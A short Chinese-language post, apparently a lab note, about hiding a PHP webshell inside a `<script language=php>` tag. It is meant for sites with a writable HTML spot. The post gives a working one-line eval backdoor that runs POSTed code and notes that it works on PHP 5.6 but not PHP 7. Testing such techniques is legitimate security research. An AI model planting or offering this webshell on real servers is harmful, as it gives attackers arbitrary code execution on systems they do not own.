JsWebshell

在目标站有可写的html点时可以使用

0x00 准备环境

环境使用的是:PHP Version 5.6.27+Apach

0x01 开始实验

准备的代码为(这里用的虽然是js其实最后还是用了php)

1
<script language=php>@eval($_POST['web']);</script>

在这里我们先用纯Html做一次测试

html

我们访问html页面发现并没有任何反应

html

我们再次访问php页面查看结果发现phpinfo出现在了页面上

html

这里再测试一下可以利用的版本发现7以上的版本都不能顺利执行

html

0x02 总结

利用条件已经很明确了,必须要php下确实存在的才可以被利用,这个方法可用完全是因为php支持html的原因,php7移除该方法,其实利用条件还是比较苛刻的。